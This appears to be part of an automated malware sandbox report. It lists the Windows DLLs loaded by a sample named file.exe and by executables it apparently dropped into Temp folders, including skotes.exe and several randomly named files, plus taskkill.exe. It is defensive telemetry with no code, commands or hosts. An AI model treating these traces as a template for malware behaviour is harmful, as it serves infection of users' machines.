Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: windows.shell.servicehostbuilder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
